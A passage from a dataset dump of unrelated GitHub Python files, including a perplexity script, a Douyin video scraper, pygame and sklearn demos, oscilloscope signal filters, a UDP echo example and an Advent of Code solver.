\")\nprint(\"----------------------------------------------------------------\")\nprint(\"The Perplexities on test set for ALPHA_PRIME = 1.0, ...., 10.0 \")\nfor k in range(10):\n print(\"Alpha \", k+1 ,\" Perplexity \",PERPLEXITY_PD_TEST_ALL_SETS[k])\n\nprint(PERPLEXITY_PD_TEST_ALL_SETS)\nfor k in range(10):\n print(\"log evidence \", k+1 ,\" \",log_evidence[k])\n\n\n#Task 2 plots\n\n#Task 2 plots\n\nplt.figure(1)\nplt.subplot(121)\nplt.plot(ALPHA_PRIME_list, PERPLEXITY_PD_TEST_ALL_SETS,'r*-')\nplt.xlabel('alpha prime')\nplt.ylabel('Perplexities on test data')\nplt.title('The Perplexities on the test data')\nplt.grid()\nplt.subplot(122)\nplt.plot(ALPHA_PRIME_list, log_evidence,'b*-')\nplt.xlabel('alpha prime')\nplt.ylabel('log evidence on training data')\nplt.title('log evidence ')\nplt.grid()\n\n\nplt.show()\n\n\n# Task 3: Author Identification\n\nfull_dic = {}\ntraining_dic = {}\n\n#Traing data pg121 reading\nwith open('pg121.txt.clean') as f:\n training = [word for line in f for word in line.split()]\nword_c_dict =collections.Counter(training)\ntraining_dic=dict(word_c_dict)\n\n\n#Reading test data in pg141\nwith open('pg141.txt.clean') as f:\n pg141 = [word for line in f for word in line.split()]\n\n#Reading test data in pg1400\n\nwith open('pg1400.txt.clean') as f:\n pg1400 = [word for line in f for word in line.split()]\n\nvocabulary = pg141 + pg1400 + training\nfull_c_dic =collections.Counter(vocabulary)\nfull_dic=dict(full_c_dic)\n\n\n\ntotal_words = full_dic.keys()\ntotal_words = list(total_words)\nK = len(total_words)\n\nN1 = len(training)\n\n\nALPHA_PRIME = 2.0\nALPHA_0 = K * ALPHA_PRIME\np_pd = {}\n\nfor k in range(K):\n m_k = training_dic.get(total_words[k], 0.01)\n alpha_k = ALPHA_PRIME\n p_pd[total_words[k]] = (m_k + alpha_k) * 1.0 / (N1 + ALPHA_0)\n\n# perplexity pg141\n\nPERPLEXITY_PD_TEST_ALL_SETS141 = 0.0\nPERPLEXITY_PD_TEST_ALL_SETS1400 = 0.0\n\nfor j in range(len(pg141)):\n PERPLEXITY_PD_TEST_ALL_SETS141 += np.log(p_pd[pg141[j]])\n\nPERPLEXITY_PD_TEST_ALL_SETS141 = np.exp(PERPLEXITY_PD_TEST_ALL_SETS141 * (-1.0) / len(pg141))\n\n# perplexity pg1400\nfor j in range(len(pg1400)):\n PERPLEXITY_PD_TEST_ALL_SETS1400 += np.log(p_pd[pg1400[j]])\n\nPERPLEXITY_PD_TEST_ALL_SETS1400 = np.exp(PERPLEXITY_PD_TEST_ALL_SETS1400 * (-1.0) / len(pg1400))\n\n\nprint(\"----------------------------------------------------------------\")\nprint(\"Perplexities on pg141.txt.clean\")\nprint(PERPLEXITY_PD_TEST_ALL_SETS141)\nprint(\"----------------------------------------------------------------\")\nprint(\"Perplexities on pg1400.txt.clean\")\nprint(PERPLEXITY_PD_TEST_ALL_SETS1400)","repo_name":"sbedekar25/Machine_Learning","sub_path":"PP1_Shantanu_Final.py","file_name":"PP1_Shantanu_Final.py","file_ext":"py","file_size_in_byte":11802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9674039287","text":"import json\nimport os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom Model import Work, Video\nimport requests\nfrom contextlib import closing\nimport time\n\n\ndef video_download(download_url, nickname, aweme_id):\n # 视频下载\n isotimeformat = '%Y-%m-%d'\n day = time.strftime(isotimeformat, time.localtime(time.time()))\n doc = './抖音视频/{}/{}'.format(day, nickname)\n if not os.path.exists(doc):\n os.makedirs(doc)\n\n filename = './抖音视频/{}/{}/{}.mp4'.format(day, nickname, aweme_id)\n try:\n with closing(requests.get(download_url, stream=True)) as r:\n chunk_size = 1024\n content_size = 
int(r.headers['content-length'])\n            with open(filename, \"wb\") as f:\n                n = 1\n                for chunk in r.iter_content(chunk_size=chunk_size):\n                    f.write(chunk)\n                    n += 1\n                print('Downloading video: {}'.format(filename))\n\n            if os.path.exists(filename):\n                return filename\n            else:\n                return None\n\n    except Exception as f:\n        print(f)\n\n\ndef get_work():\n    # Database location\n    engine = create_engine(\"mysql+pymysql://root:pythonman@127.0.0.1/TikTok?charset=utf8\")\n\n    # Create a session\n    session = sessionmaker(engine)\n    mySession = session()\n    results = mySession.query(Work).all()\n\n    for result in results:\n        status = result.status\n        if status == 0:\n            id = result.id\n            url = result.url\n            host = result.Host\n            connection = result.Connection\n            x_tt_trace_id = result.x_tt_trace_id\n            Cookie = result.Cookie\n            X_Khronos = result.X_Khronos\n            X_Gorgon = result.X_Gorgon\n\n            headers = {\n                'Host':host,\n                'Connection': connection,\n                'sdk-version': '1',\n                'User-Agent': 'Aweme 7.7.0 rv:77019 (iPhone; iOS 12.3.1; zh_CN) Cronet',\n                'x-tt-trace-id':x_tt_trace_id,\n                'Accept-Encoding': 'gzip, deflate',\n                'Cookie': Cookie,\n                'X-Khronos': X_Khronos,\n                'X-Gorgon': X_Gorgon,\n            }\n            rsp = requests.get(url, headers=headers, verify=False, allow_redirects=False)\n            if rsp.status_code == 200:\n                nickname = ''\n                data = json.loads(rsp.text)\n                works = data['aweme_list']\n                if works is None:\n                    pass\n                else:\n                    for work in works:\n                        aweme_id = work['aweme_id']\n                        title = work['desc']\n                        nickname = work['author']['nickname']\n                        download_url = work['video']['play_addr']['url_list'][0]\n                        result = mySession.query(Work).filter_by(id=aweme_id).first()\n                        if result is None:\n                            try:\n                                result = mySession.query(Video).filter_by(aweme_id=aweme_id).first()\n                                if result is None:\n                                    video_download(download_url, nickname, aweme_id)\n                                    video = Video(aweme_id=aweme_id, nickname=nickname, title=title)\n                                    mySession.add(video)\n                                    mySession.commit()\n\n                            except Exception as f:\n                                print(f)\n                                pass\n                        else:\n                            print('Video already exists')\n\n            mySession.query(Work).filter(Work.id == id).update({\"status\": \"1\", \"user_name\":nickname})\n            mySession.commit()\n\n\ndef run():\n    get_work()\n\n\nif __name__ == '__main__':\n    run()","repo_name":"nemonday/TikToKSpider","sub_path":"GetWork.py","file_name":"GetWork.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"2306936292","text":"import pygame\nimport random\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\n\n# Set the width and height of the screen [width, height]\nWIDTH = 700\nHEIGHT = 500\n\n# Initialize Pygame\npygame.init()\n\n# Set the size of the screen\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\n# Set the caption of the window\npygame.display.set_caption(\"Dynamic Obstacles\")\n\n# Define the class for the moving obstacles\nclass Obstacle(pygame.sprite.Sprite):\n    def __init__(self, x, y, speed):\n        super().__init__()\n        self.image = pygame.Surface([30, 30])\n        self.image.fill(RED)\n        self.rect = self.image.get_rect()\n        self.rect.x = x\n        self.rect.y = y\n        self.speed = speed\n\n    def update(self):\n        self.rect.x += self.speed\n        if self.rect.right > WIDTH or self.rect.left < 0:\n            self.speed = -self.speed\n\n# Define the class for the player\nclass Player(pygame.sprite.Sprite):\n    def __init__(self, x, y):\n        super().__init__()\n        self.image = pygame.Surface([30, 30])\n        self.image.fill(WHITE)\n        self.rect = self.image.get_rect()\n        self.rect.x = x\n        self.rect.y = y\n\n    def update(self, x, y):\n        self.rect.x = x\n        self.rect.y = y\n\n# Create a 
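# [Aside, not from the original file: a sprite Group fans a single update()
# or draw() call out to every member sprite, which is why the main loop below
# only ever touches the groups. If obstacle hits mattered here, the stock
# pygame idiom would be roughly:
#
#     hits = pygame.sprite.spritecollide(player, obstacle_list, False)
#     if hits:
#         done = True  # player touched an obstacle
# ]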
list of all the sprites\nall_sprites_list = pygame.sprite.Group()\n\n# Create a list of the moving obstacles\nobstacle_list = pygame.sprite.Group()\n\n# Create the player object\nplayer = Player(50, 50)\nall_sprites_list.add(player)\n\n# Create some initial obstacles\nfor i in range(5):\n x = random.randrange(WIDTH - 30)\n y = random.randrange(HEIGHT - 30)\n speed = random.randrange(1, 5)\n obstacle = Obstacle(x, y, speed)\n all_sprites_list.add(obstacle)\n obstacle_list.add(obstacle)\n\n# Set the clock for the game\nclock = pygame.time.Clock()\n\n# Start the game loop\ndone = False\nwhile not done:\n # --- Event Processing ---\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # --- Game Logic ---\n # Get the mouse position and update the player\n pos = pygame.mouse.get_pos()\n player.update(pos[0], pos[1])\n\n # Update the moving obstacles\n obstacle_list.update()\n\n # --- Drawing ---\n # Clear the screen\n screen.fill(BLACK)\n\n # Draw all the sprites\n all_sprites_list.draw(screen)\n\n # --- Wrap-up ---\n # Update the screen\n pygame.display.flip()\n\n # Set the game's frame rate\n clock.tick(60)\n\n# Close the window and quit Pygame\npygame.quit()\n","repo_name":"22by7-raikar/Motion-Planning-in-Dynamic-Enviroment","sub_path":"PyGameEnvironments/DynamicObstacles1.py","file_name":"DynamicObstacles1.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27817026741","text":"\"\"\"\n=========================================================\nClassification Example\n=========================================================\nThis example uses the `iris` dataset, in order to \ndemonstrate a classification technique. \nSupport Vector Classifier is used in the model.\n\nThe classification report and the confusion matrix are also generated\n\"\"\"\nprint(__doc__)\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom sklearn.metrics import f1_score, classification_report, confusion_matrix\n\nimport pandas as pd\n\n# Get the data\niris = datasets.load_iris()\n\nfeatures = iris.data\nlabels = iris.target\n\n# Split the data for training and testing\nfeatures_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=.5)\n\n# Train a Support Vector Classifier\nsv_classifier = svm.SVC()\nsv_classifier.fit(features_train, labels_train)\n\n# Test the classifier\npredictions = sv_classifier.predict(features_test)\n\n# Evaluate\nreport = classification_report(labels_test, predictions, target_names=iris.target_names)\nprint(report)\n\nconfusion_df = pd.DataFrame(confusion_matrix(labels_test, predictions),\n columns=[\"Predicted - \" + str(class_name) for class_name in iris.target_names],\n index = [\"Actual - \" + str(class_name) for class_name in iris.target_names])\n\nprint(confusion_df)","repo_name":"saikishandasari/a_for_ai","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29648766094","text":"import pytesseract\r\nfrom PIL import Image\r\nfrom flask import Flask, request\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/web-photo-ocr.py\", methods=[\"POST\"])\r\ndef process_image():\r\n image_file = request.files[\"image\"]\r\n image = Image.open(image_file)\r\n text = 
pytesseract.image_to_string(image)\r\n\r\n return text\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host=\"localhost\", port=8000)\r\n","repo_name":"mahavirprasad/photo-ocr","sub_path":"web-photo-ocr.py","file_name":"web-photo-ocr.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38908846403","text":"\"\"\"K. Miernik 2019\nk.a.miernik@gmail.com\nDistributed under GNU General Public Licence v3\n\nSome useful functions that could be used with pico_pet script and\nother setups.\n\n\"\"\"\nimport datetime\nimport numpy\nimport xml.dom.minidom\nfrom scipy.interpolate import CubicSpline\nfrom scipy.signal import find_peaks\n\n\ndef progress_bar(n, n_max, time_to_n=None):\n \"\"\"\n Show progress bar with arrow, completed percentage and optional\n current time and projected time to finish.\n \"\"\"\n print('\\r', end='')\n text = ''\n done = int(n / n_max * 40)\n text += ('[' + '=' * (done - 1) + '>' + '.' * (40 - done - 1) + ']' + \n ' {:>5.2f}% '.format((n / n_max) * 100))\n if time_to_n is not None:\n text += '{:>5.1f} s (est. {:>5.1f} s) '.format(time_to_n, \n time_to_n * n_max / n)\n print(text, end='', flush=True)\n\n\ndef get_number(text, default, number_type='float'):\n try:\n if number_type == 'float':\n r = float(text)\n else:\n r = int(text)\n except (AttributeError, ValueError):\n print('Warning, could not convert', text, 'to', number_type, \n 'reverting to default value')\n return default\n return r\n\n\ndef load_configuration(file_name):\n configuration = {}\n try:\n dom = xml.dom.minidom.parse(file_name)\n config = dom.getElementsByTagName('config')[0]\n\n hardware = config.getElementsByTagName('hardware')[0]\n\n samples = hardware.getElementsByTagName('samples')[0]\n configuration['timebase'] = get_number(\n samples.getAttribute('timebase'), 4, 'int')\n configuration['pre'] = get_number(\n samples.getAttribute('pre'), 100, 'int')\n configuration['post'] = get_number(\n samples.getAttribute('post'), 1000, 'int')\n configuration['captures'] = get_number(\n samples.getAttribute('captures'), 1, 'int')\n\n configuration['ch_range'] = get_number(\n samples.getAttribute('ch_range'), 1024, 'int')\n configuration['t_range'] = get_number(\n samples.getAttribute('t_range'), 100, 'int')\n\n trigger = hardware.getElementsByTagName('trigger')[0]\n configuration['trigger'] = {\n 'source' : trigger.getAttribute('source').upper(),\n 'direction' : trigger.getAttribute('direction').upper(),\n 'threshold' : get_number(trigger.getAttribute('threshold'), \n 0.0),\n 'autotrigger': get_number(trigger.getAttribute('autotrigger'),\n 0, 'int')\n }\n\n channels = hardware.getElementsByTagName('channel')\n for ch in channels:\n name = ch.getAttribute('name').upper()\n coupling = ch.getAttribute('coupling').upper()\n v_range = get_number(ch.getAttribute('range'), 1.0)\n offset = get_number(ch.getAttribute('offset'), 0.0)\n\n trapez = ch.getElementsByTagName('filter')[0]\n L = get_number(trapez.getAttribute('L'), 10, 'int')\n G = get_number(trapez.getAttribute('G'), 10, 'int')\n B = get_number(trapez.getAttribute('B'), 10, 'int')\n threshold = get_number(trapez.getAttribute('threshold'), 0.0)\n tau = get_number(trapez.getAttribute('tau'), 10)\n method = trapez.getAttribute('method')\n\n configuration[name] = { \n 'coupling' : coupling,\n 'range' : v_range,\n 'offset' : offset,\n 'filter' : {'L' : L, \n 'G' : G, \n 'tau' : tau,\n 'B' : B, \n 'method' : method,\n 'threshold': threshold\n }\n }\n\n analysis 
= config.getElementsByTagName('analysis')\n if len(analysis) > 0:\n channels = analysis[0].getElementsByTagName('channel')\n for ch in channels:\n name = ch.getAttribute('name').upper()\n calib = ch.getAttribute('calibration')\n calib = calib.split(',')\n calib_params = []\n for par in calib:\n calib_params.append(float(par))\n\n window = ch.getAttribute('window')\n window = window.split(',')\n window_params = []\n for par in window:\n window_params.append(float(par))\n\n configuration[name]['calib'] = calib_params\n configuration[name]['window'] = window_params\n coin = analysis[0].getElementsByTagName('coincidences')\n if len(coin) > 0:\n configuration['coin'] = get_number(\n coin[0].getAttribute('dt'), 1000.0)\n else:\n configuration['coin'] = 0.0\n\n except (ValueError, IndexError) as err:\n print(err)\n return False\n return configuration\n\n\ndef trapezoidal(v, params, clock, pileup='max'):\n \"\"\"\n Applies trapezoidal filter to a waveform v\n V.T. Jordanov NIMA 353 (1994) 261\n\n * params are a dictionary\n o params['filter']['B'] - baseline (number of samples in front \n taken to calculate average baseline)\n o params['filter']['L'] - length (in samples) see article for details\n o params['filter']['G'] - gap (in samples) see article for details\n o params['filter']['tau'] - signal decay constant\n o params['filter']['threshold'] - threshold for local maxima level \n in the filtered signal (see below)\n\n * pileup - mode of pileups treatment\n o 'max' - (default) take the maximum value from the filtered signal,\n this is the fastest, method but if there are pileups in\n the signal, all are rejected except of highest amplitude\n o 'all' - find all local maxima in the filtered signal above threshold\n threshold is calculated from threshold:\n Vtr * tau\n\n * returns A, s - amplitudes vector and filtered signal\n \"\"\"\n b = params['filter']['B']\n k = params['filter']['L']\n m = params['filter']['G']\n tau = params['filter']['tau']\n threshold = params['filter']['threshold']\n\n base = v[0:b].sum() / b\n N = len(v)\n d = numpy.zeros(N)\n p = numpy.zeros(N)\n r = numpy.zeros(N)\n s = numpy.zeros(N)\n l = k + m\n M = 1 / (numpy.exp(clock / tau) - 1)\n\n d[0] = v[0] - base\n p[0] = d[0]\n r[0] = p[0] + M * d[0]\n s[0] = r[0]\n\n for n in range(1, k):\n d[n] = v[n] - base\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n for n in range(k, l):\n d[n] = v[n] - v[n-k]\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n for n in range(l, l + k):\n d[n] = v[n] - v[n-k] - v[n-l] + base\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n for n in range(l + k, N):\n d[n] = v[n] - v[n-k] - v[n-l] + v[n-l-k]\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n if pileup == 'all':\n peaks, _ = find_peaks(abs(s / k), prominence=threshold * tau,\n distance=params['filter']['L'])\n return abs(s[peaks]) / k, s / k, peaks\n else:\n return [max(abs(s)) / k], s / k, numpy.argmax(abs(s))\n\n\n\ndef zero_crossing(trace, base=15, shift=10, chi=0.6, falling=True):\n \"\"\"\n Calculates trigger time based on zero crossing algorithm\n NIMA 775 (2015) 71–76\n\n * trace - a waveform to be analyzed\n * base - number of samples in front to calculate average baseline\n * shift - algorithm parameter (see article for more details)\n * chi - algorithm parameter (see article for more details)\n * falling - signal defaults to falling edge\n * returns trigger time in time stamps\n \"\"\"\n\n try:\n bs = 
numpy.average(trace[0:base])\n inv = numpy.zeros(trace.shape)\n inv[shift:] = trace[0:-shift] - bs\n zc = chi * (trace - bs) - inv\n if falling:\n zc *= -1\n t_lim, = numpy.unravel_index(zc.argmax(), zc.shape)\n t0 = numpy.argmax(zc[t_lim:] < 0) + t_lim\n\n t_zc = numpy.arange(t0 - 3, t0 + 3)\n y_zc = zc[t0-3:t0+3]\n cs = CubicSpline(t_zc, y_zc)\n r = cs.solve(0.0)\n\n for ri in r:\n if numpy.isreal(ri) and t_zc[0] < ri < t_zc[-1]:\n return ri\n except ValueError:\n pass\n return 0\n\n\n\ndef amplitude(s, params, clock, pileup='all'):\n if params['filter']['method'] == 'trapezoidal':\n A, sa, pa = trapezoidal(s, params, clock, pileup)\n else:\n baseline = s[0:params['B']].sum() / params['B']\n if params['filter']['method'] == 'sum':\n A = abs((s - baseline).sum()) / s.shape[0]\n else:\n A = max(abs(s - baseline))\n return A\n","repo_name":"kmiernik/PicoNuclear","sub_path":"src/PicoNuclear/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38121526351","text":"import pygame\r\n\r\n\r\nclass Score(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n self.step = 0\r\n self.points = 0\r\n self.font = pygame.font.Font(r\"assets\\fonts\\gamefont.ttf\", 20)\r\n self.image = self.font.render(f\"HI: {self.points}\", True, (83, 83, 83))\r\n self.rect = self.image.get_rect()\r\n surface = pygame.display.get_surface()\r\n self.rect.topright = (surface.get_width(), 0)\r\n\r\n def draw(self, surface):\r\n surface.blit(self.image, (550, 20))\r\n self.image = self.font.render(f\"HI: {self.points}\", True, (83, 83, 83))\r\n\r\n def update(self):\r\n self.step += 1\r\n if self.step % 10 == 0:\r\n self.points += 1\r\n","repo_name":"Konstantin-create/Google-Dino-Python","sub_path":"sprites/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28339015857","text":"class Node:\n\t\n def __init__(self, key):\n self.key = key\n self.left = None\n self.right = None\n\t\n\ndef findLCA(root, n1, n2):\n\t\n\t\n if root is None:\n return None\n\n\t\n if root.key == n1 or root.key == n2:\n return root\n\n left_lca = findLCA(root.left, n1, n2)\n right_lca = findLCA(root.right, n1, n2)\n\n\t\n if left_lca and right_lca:\n return root\n\n return left_lca if left_lca is not None else right_lca\n\n\n\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\nroot.right.left = Node(6)\nroot.right.right = Node(7)\nprint(\"LCA(3,7) = \", findLCA(root, 3, 7).key)\n\n\"\"\"\nThe time complexity of the above solution is O(n) as the method does a simple tree traversal \nThe space complexity of the above solution is O(1)\n\"\"\"\n","repo_name":"AshikurRahman-sec/Bongo","sub_path":"Problem three.py","file_name":"Problem three.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21956407123","text":"import cv2\nimport numpy as np\nfrom student_code import my_imfilter, create_hybrid_image\nfrom unit_tests import test_fft_blur\nimport matplotlib.pyplot as plt\nfrom utils import vis_hybrid_image, load_image, save_image\n\ndef main():\n\tcutoff_frequency = 7\n\tfilter = cv2.getGaussianKernel(ksize=cutoff_frequency * 4 + 1,\n\t sigma=cutoff_frequency)\n\tfilter = np.dot(filter, filter.T)\n\n\t# Filtering 
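	# [Aside, not from the original file: cv2.getGaussianKernel returns a
	# normalized (ksize, 1) column vector, so the np.dot(filter, filter.T)
	# above is an outer product building the full 2-D kernel -- valid because
	# a 2-D Gaussian is separable, G(x, y) = g(x) * g(y). A rough NumPy-only
	# equivalent, assuming the same cutoff_frequency:
	#
	#     k = cutoff_frequency * 4 + 1
	#     x = np.arange(k) - k // 2
	#     g = np.exp(-x ** 2 / (2.0 * cutoff_frequency ** 2))
	#     g /= g.sum()
	#     kernel_2d = np.outer(g, g)
	# ]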
example\n\t# dog = load_image('../data/dog.bmp')\n\t# dog_blurred = my_imfilter(dog, filter)\n\t# save_image('../results/dog_blurred.jpg', dog_blurred)\n\n\t# Black and white hybrid\n\teinstein = load_image('../data/einstein.bmp')\n\tmarilyn = load_image('../data/marilyn.bmp')\n\t# low, high, hybrid = create_hybrid_image(marilyn, einstein, filter)\n\t# high = np.clip(high, 0, 255)\n\t# vis = vis_hybrid_image(hybrid)\n\t# plt.figure()\n\t# plt.imshow((low * 255).astype(np.uint8))\n\t# plt.figure()\n\t# plt.imshow(((high + 0.5) * 255).astype(np.uint8))\n\t# plt.figure(figsize=(20, 20))\n\t# plt.imshow(vis)\n\t# save_image('../results/einstein_high.jpg', high)\n\t# save_image('../results/einstein_high_boosted.jpg', high+0.5)\n\t# save_image('../results/marilyn_low.jpg', low)\n\t# save_image('../results/einrilyn.jpg', hybrid)\n\t# save_image('../results/einrilyn_vis.jpg', vis)\n\n\t# Bike Motorcycle hybrid\n\tbike = load_image('../data/bicycle.bmp')\n\tmotorcycle = load_image('../data/motorcycle.bmp')\n\t# low, high, hybrid = create_hybrid_image(bike, motorcycle, filter)\n\t# high = np.clip(high, 0, 255)\n\t# vis = vis_hybrid_image(hybrid)\n\t# plt.figure()\n\t# plt.imshow((low * 255).astype(np.uint8))\n\t# plt.figure()\n\t# plt.imshow(((high + 0.5) * 255).astype(np.uint8))\n\t# plt.figure(figsize=(20, 20))\n\t# plt.imshow(vis)\n\t# save_image('../results/motorcycle_high.jpg', high)\n\t# save_image('../results/bike_low.jpg', low)\n\t# save_image('../results/motorbike.jpg', hybrid)\n\t# save_image('../results/motorbike_vis.jpg', vis)\n\n\t# Chicken/dinosaur hybrid\n\tdino = load_image('../data/dinosaur.jpg')\n\tchicken = load_image('../data/chicken.jpg')\n\tlow, high, hybrid = create_hybrid_image(chicken, dino, filter)\n\tvis = vis_hybrid_image(hybrid)\n\t# plt.figure()\n\t# plt.imshow((low * 255).astype(np.uint8))\n\t# plt.figure()\n\t# plt.imshow(((high + 0.5) * 255).astype(np.uint8))\n\t# plt.figure(figsize=(20, 20))\n\t# plt.imshow(vis)\n\tsave_image('../results/dino_high.jpg', high)\n\tsave_image('../results/chicken_low.jpg', low)\n\tsave_image('../results/chickno.jpg', hybrid)\n\tsave_image('../results/chickno_vis.jpg', vis)\n\n\t# Convolution steps\n\t# sub = load_image(\"../data/submarine.bmp\")\n\t# shifted, low = test_fft_blur(sub, filter)\n\t# save_image('../results/sub_blurred.jpg', low)\n\t# save_image('../results/sub_shifted.jpg', shifted)\n\tplt.show()\n\nmain()\n","repo_name":"isw4/CVision01-Filtering","sub_path":"src/cases_for_report.py","file_name":"cases_for_report.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70957343403","text":"def batched(iterable, length):\n    \"\"\"\n    Simple implementation of itertools.batched from Python 3.12.\n    Generator that yields chunks of length (length) from the iterable.\n    \"\"\"\n\n    cursor = 0\n    while cursor < len(iterable):\n        yield iterable[cursor:cursor + length]\n        cursor += length\n","repo_name":"fixermark/brilliant-monocle-driver-python","sub_path":"src/brilliant_monocle_driver/batched.py","file_name":"batched.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"73301685482","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport socket\nimport random\nimport argparse\nfrom datetime import datetime\n\ndef server(hostname, port):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    sock.bind((hostname, port))\n    
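# Report the bound address, then answer incoming datagrams forever.\n    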
print('Listening at {}'.format(sock.getsockname()))\n    while True:\n        data, address = sock.recvfrom(65536)\n        if random.random() < 0.5:\n            print('Pretending to drop packet from {}'.format(address))\n            continue\n        text = data.decode('utf-8')\n        print('The client at {} says {!r}'.format(address, text))\n        text = 'Your data was {} bytes long'.format(len(data))\n        sock.sendto(text.encode('utf-8'), address)\n\ndef client(hostname, port):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    text = '[{}] Hi, how are you?'.format(datetime.now())\n    data = text.encode('utf-8')\n    sock.connect((hostname, port))\n    print('The OS assigned me the address {}'.format(sock.getsockname()))\n    delay = 0.1\n    while True:\n        sock.send(data)\n        print('Waiting up to {} seconds for a reply'.format(delay))\n        sock.settimeout(delay)\n        try:\n            data = sock.recv(65536)\n        except socket.timeout:\n            delay *= 2\n            if delay > 2.0:\n                raise RuntimeError('I think the server is down')\n        else:\n            break\n    text = data.decode('utf-8')\n    print('The server {} replied {!r}'.format(sock.getpeername(), text))\n\nif __name__ == '__main__':\n    choices = {'client': client, 'server': server}\n    parser = argparse.ArgumentParser(description='Send and receive UDP locally')\n    parser.add_argument('role',\n                        choices=choices,\n                        help='which role to play')\n    parser.add_argument('host',\n                        help='interface the server listens at; '\n                             'host the client sends to')\n    parser.add_argument('-p',\n                        metavar='PORT',\n                        type=int,\n                        default=1060)\n    args = parser.parse_args()\n    function = choices[args.role]\n    function(args.host, args.p)\n","repo_name":"alpha-eric/py3","sub_path":"udp_random.py","file_name":"udp_random.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"8482595238","text":"# Create a program with a leiaInt() function that works much like Python's input(), but validates the input so that only a numeric value is accepted. Ex: n = leiaInt('Type a number: ')\ndef leiaint(n):\n    while True:\n        num = input(n)\n        if num.isnumeric():\n            return num\n        else:\n            print('\\033[31mERROR! 
Type a valid number\\033[m')\n\n\n\n\nn = leiaint('Type a number: ')\n\nprint(f'The number typed was: {n}')","repo_name":"RodrigoArgenton/testepython","sub_path":"3 - Mundo 3/4 - Função/desafio104.py","file_name":"desafio104.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"21991535921","text":"# Standard library imports\nimport pathlib\nimport sys\nimport re\nimport math\nimport functools\nimport time\nfrom itertools import product\n\n\ndef parse(puzzle_input):\n    \"\"\"Parse input\"\"\"\n    return [[parse_line(line) for line in block.splitlines()] for block in puzzle_input.split(\"inp w\\n\")][1:]\n\n\ndef parse_line(line):\n    values = line.split(\" \")\n    operation = values[0]\n    return operation, values[1:]\n\n\ndef part1(data):\n    \"\"\"Solve part 1\"\"\"\n    failed_attempts = [set() for _ in range(14)]\n    result = \"-1\"\n    for w in range(1, 10):\n        result = do_operations_on(w, 0, 0, 0, data, failed_attempts)\n        if result != \"-1\":\n            return result\n    print(\"no solution found\")\n\n    # memory = [SpotValue(\"val\", \"w0\", \"\"), SpotValue(\"val\", 0, \"\"), SpotValue(\"val\", 0, \"\"), SpotValue(\"val\", 0, \"\")]\n    # for i in range(len(data[:4])):\n    #     memory[0] = SpotValue(\"val\", \"w\" + str(i), \"\")\n    #     for operator, values in data[i]:\n    #         print(operator, values)\n    #         pos = convert_to_mem(values[0])\n    #         first = memory[pos]\n    #         second = get_value(values[1], memory)\n    #         memory[pos] = SpotValue(operator, first, second)\n    #         memory[pos] = memory[pos].simplify()\n    #     print_memory(memory)\n\n    return result\n\n\ndef print_memory(memory):\n    print(\"w=\", memory[0].to_string(), \", x=\", memory[1].to_string(), \", y=\", memory[2].to_string(), \", z=\",\n          memory[3].to_string())\n\n\nclass SpotValue:\n\n    def __init__(self, ope, first, second):\n        self.ope = ope\n        self.first = first\n        self.second = second\n\n    def to_string(self):\n        if isinstance(self.first, SpotValue):\n            s1 = self.first.to_string()\n        else:\n            s1 = str(self.first)\n        if isinstance(self.second, SpotValue):\n            s2 = self.second.to_string()\n        else:\n            s2 = str(self.second)\n\n        if self.ope == \"val\":\n            return s1\n        elif self.ope == \"add\":\n            return \"(\" + s1 + \"+\" + s2 + \")\"\n        elif self.ope == \"mul\":\n            return s1 + \"*\" + s2\n        elif self.ope == \"div\":\n            return s1 + 